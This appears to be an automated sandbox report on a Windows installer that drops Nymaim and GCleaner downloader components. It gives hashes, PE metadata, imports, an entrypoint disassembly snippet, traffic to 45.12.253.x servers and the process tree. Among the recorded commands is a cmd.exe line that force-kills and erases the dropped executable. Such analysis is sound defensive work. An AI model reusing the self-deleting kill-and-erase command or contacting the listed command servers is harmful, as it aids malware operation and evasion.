              Size (bytes):6144
              Entropy (8bit):4.215994423157539
              Encrypted:false
              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
              MD5:4FF75F505FDDCC6A9AE62216446205D9
              SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
              SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
              SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\is-J872N.tmp\_isetup\_shfoldr.dll

              Download File
              Process:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
              Category:dropped
              Size (bytes):23312
              Entropy (8bit):4.596242908851566
              Encrypted:false
              SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
              MD5:92DC6EF532FBB4A5C3201469A5B5EB63
              SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
              SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
              SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp

              Download File
              Process:C:\Users\user\Desktop\file.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):712704
              Entropy (8bit):6.4837542632664515
              Encrypted:false
              SSDEEP:12288:9QtLeYXPEv4arPEn37TzH7A6p3xxu9yz/eERMY1VLJrNufs9RZM2GHOQyD362kS0:+tCUA4arPEn37TzH7A6nw9yzeESUFWH/
              MD5:D76329B30DB65F61D55B20F36B56DA26
              SHA1:5E4C77B723AE8F05B3AE6AFEEE735A4355F00663
              SHA-256:229FBCB11EE7D1F082B6411610E95F726EEC4E6737E6B6392719DF4F0FE3FA1D
              SHA-512:A291AED0897315E88B6378B1DB10ADA05BDA8C1ECCAF73DE23F409FE61860EBD1DBB422063E00996584D3B4B100122931D5BBAB54A88951706D75EFCC660F70D
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 2%
              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................b...........n............@..............................................@...............................%.......@..........................................................................................................CODE.....`.......b.................. ..`DATA.................f..............@...BSS..................x...................idata...%.......&...x..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc....@.......@..................@..P.....................j..............@..P........................................................................................................................................

              C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe

              Download File
              Process:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):73728
              Entropy (8bit):6.20389308045717
              Encrypted:false
              SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
              MD5:3FB36CB0B7172E5298D2992D42984D06
              SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
              SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
              SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 60%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.993082674497476
              TrID:
              • Win32 Executable (generic) a (10002005/4) 98.86%
              • Inno Setup installer (109748/4) 1.08%
              • Win16/32 Executable Delphi generic (2074/23) 0.02%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              File name:file.exe
              File size:1825141
              MD5:209dca1a9633807b9cf36d6447f972da
              SHA1:c4235ac91cd8e3c0e70ede54e43f857709f00859
              SHA256:2004da2c60d73a66c6feffe50f130483750da799b90a78c76da90f61208101e6
              SHA512:d965feebe07c36d6e5b2b465a3639423c64ed293dde059e130c6586145d547745ed53bfcd9e3085f9d176960b746892efe5aea526aebf647609894f30a257295
              SSDEEP:49152:ZLlc1oFvcnMNVYwUblC5LPUuQ6iArG7WUD8aXBCLCgv2MR:TzvcMjzcJ/qqTDLBqv2MR
              TLSH:DD8533454E82D871E0236D76583E81DACD77BF2B247471402B4CFB9E37EB2D6920AB91
              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

              File Icon

              Icon Hash:a2a0b496b2caca72

              Static PE Info

              General

              Entrypoint:0x409c18
              Entrypoint Section:CODE
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:1
              OS Version Minor:0
              File Version Major:1
              File Version Minor:0
              Subsystem Version Major:1
              Subsystem Version Minor:0
              Import Hash:884310b1928934402ea6fec1dbd3cf5e

              Entrypoint Preview

              Instruction
              push ebp
              mov ebp, esp
              add esp, FFFFFFC4h
              push ebx
              push esi
              push edi
              xor eax, eax
              mov dword ptr [ebp-10h], eax
              mov dword ptr [ebp-24h], eax
              call 00007F2B449DEA43h
              call 00007F2B449DFC4Ah
              call 00007F2B449DFED9h
              call 00007F2B449E1EE8h
              call 00007F2B449E1F2Fh
              call 00007F2B449E485Eh
              call 00007F2B449E49C5h
              xor eax, eax
              push ebp
              push 0040A2D4h
              push dword ptr fs:[eax]
              mov dword ptr fs:[eax], esp
              xor edx, edx
              push ebp
              push 0040A29Dh
              push dword ptr fs:[edx]
              mov dword ptr fs:[edx], esp
              mov eax, dword ptr [0040C014h]
              call 00007F2B449E542Bh
              call 00007F2B449E505Eh
              lea edx, dword ptr [ebp-10h]
              xor eax, eax
              call 00007F2B449E2518h
              mov edx, dword ptr [ebp-10h]
              mov eax, 0040CDE8h
              call 00007F2B449DEAEFh
              push 00000002h
              push 00000000h
              push 00000001h
              mov ecx, dword ptr [0040CDE8h]
              mov dl, 01h
              mov eax, 00407364h
              call 00007F2B449E2DA7h
              mov dword ptr [0040CDECh], eax
              xor edx, edx
              push ebp
              push 0040A255h
              push dword ptr fs:[edx]
              mov dword ptr fs:[edx], esp
              call 00007F2B449E549Bh
              mov dword ptr [0040CDF4h], eax
              mov eax, dword ptr [0040CDF4h]
              cmp dword ptr [eax+0Ch], 01h
              jne 00007F2B449E55DAh
              mov eax, dword ptr [0040CDF4h]
              mov edx, 00000028h
              call 00007F2B449E31A8h
              mov edx, dword ptr [000000F4h]

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xd0000x950.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x110000x2c00.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0xf0000x18.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              CODE0x10000x933c0x9400False0.6138883023648649data6.557291120606636IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              DATA0xb0000x24c0x400False0.3134765625data2.7679914923058866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              BSS0xc0000xe4c0x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0xd0000x9500xa00False0.414453125data4.430733069799036IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0xe0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0xf0000x180x200False0.052734375data0.2044881574398449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .reloc0x100000x8b40x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
              .rsrc0x110000x2c000x2c00False0.32421875data4.466554376757956IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x113540x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands
              RT_ICON0x1147c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands
              RT_ICON0x119e40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands
              RT_ICON0x11ccc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands
              RT_STRING0x125740x2f2data
              RT_STRING0x128680x30cdata
              RT_STRING0x12b740x2cedata
              RT_STRING0x12e440x68data
              RT_STRING0x12eac0xb4data
              RT_STRING0x12f600xaedata
              RT_RCDATA0x130100x2cdata
              RT_GROUP_ICON0x1303c0x3edataEnglishUnited States
              RT_VERSION0x1307c0x4b8COM executable for DOSEnglishUnited States
              RT_MANIFEST0x135340x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

              Imports

              DLLImport
              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
              user32.dllMessageBoxA
              oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
              kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
              user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
              comctl32.dllInitCommonControls
              advapi32.dllAdjustTokenPrivileges

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              DutchNetherlands
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              45.12.253.72192.168.2.380497022852925 01/25/23-10:17:06.150578TCP2852925ETPRO TROJAN GCleaner Downloader - Payload Response804970245.12.253.72192.168.2.3

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 25, 2023 10:17:05.936774969 CET4970180192.168.2.345.12.253.56
              Jan 25, 2023 10:17:05.963335037 CET804970145.12.253.56192.168.2.3
              Jan 25, 2023 10:17:05.963465929 CET4970180192.168.2.345.12.253.56
              Jan 25, 2023 10:17:05.963747978 CET4970180192.168.2.345.12.253.56
              Jan 25, 2023 10:17:05.989998102 CET804970145.12.253.56192.168.2.3
              Jan 25, 2023 10:17:05.996356964 CET804970145.12.253.56192.168.2.3
              Jan 25, 2023 10:17:05.996470928 CET4970180192.168.2.345.12.253.56
              Jan 25, 2023 10:17:06.035572052 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.062125921 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.062306881 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.064057112 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.090361118 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.090794086 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.090888977 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.123739958 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.150029898 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.150578022 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.150629044 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.150657892 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.150680065 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.150760889 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.150805950 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.150826931 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.150862932 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.150893927 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.150949001 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.150964022 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.151006937 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.151025057 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.151068926 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.151088953 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.151125908 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.151149988 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.151205063 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.151218891 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.151254892 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.177668095 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.177733898 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.177781105 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.177809954 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.177809954 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.177839994 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.177886009 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.177938938 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.177953005 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.177988052 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178018093 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178070068 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178083897 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178118944 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178145885 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178194046 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178240061 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178282976 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178304911 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178333998 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178368092 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178412914 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178432941 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178476095 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178497076 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178524971 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178559065 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178603888 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178648949 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178719044 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178734064 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.178778887 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178822994 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.178843021 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.179163933 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205178022 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205246925 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205295086 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205324888 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205351114 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205351114 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205401897 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205446005 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205466032 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205502033 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205529928 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205581903 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205595970 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205629110 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205657959 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205708981 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205723047 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205759048 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205785036 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205833912 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205848932 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205882072 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.205913067 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205966949 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.205981016 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.206015110 CET4970280192.168.2.345.12.253.72
              Jan 25, 2023 10:17:06.206042051 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.206094027 CET804970245.12.253.72192.168.2.3
              Jan 25, 2023 10:17:06.206108093 CET4970280192.168.2.345.12.253.72

              HTTP Request Dependency Graph

              • 45.12.253.56
              • 45.12.253.72
              • 45.12.253.75

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:10:16:59
              Start date:25/01/2023
              Path:C:\Users\user\Desktop\file.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\file.exe
              Imagebase:0x400000
              File size:1825141 bytes
              MD5 hash:209DCA1A9633807B9CF36D6447F972DA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Target ID:1
              Start time:10:17:00
              Start date:25/01/2023
              Path:C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\is-P0SS2.tmp\file.tmp" /SL5="$4025C,1578849,54272,C:\Users\user\Desktop\file.exe"
              Imagebase:0x400000
              File size:712704 bytes
              MD5 hash:D76329B30DB65F61D55B20F36B56DA26
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 2%, ReversingLabs
              Reputation:moderate

              General

              Target ID:2
              Start time:10:17:01
              Start date:25/01/2023
              Path:C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe"
              Imagebase:0x400000
              File size:1327101 bytes
              MD5 hash:04947B1020E31A5F5A6E41FD279B4E74
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.322664682.00000000019A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.321983093.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low

              General

              Target ID:3
              Start time:10:17:04
              Start date:25/01/2023
              Path:C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\wEQg8.exe
              Wow64 process (32bit):true
              Commandline:
              Imagebase:0x2f0000
              File size:73728 bytes
              MD5 hash:3FB36CB0B7172E5298D2992D42984D06
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Antivirus matches:
              • Detection: 60%, ReversingLabs
              Reputation:high

              General

              Target ID:13
              Start time:10:17:37
              Start date:25/01/2023
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit
              Imagebase:0xb0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:14
              Start time:10:17:37
              Start date:25/01/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff745070000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:15
              Start time:10:17:37
              Start date:25/01/2023
              Path:C:\Windows\SysWOW64\taskkill.exe
              Wow64 process (32bit):true
              Commandline:taskkill /im "finalrecovery.exe" /f
              Imagebase:0xe10000
              File size:74752 bytes
              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              No disassembly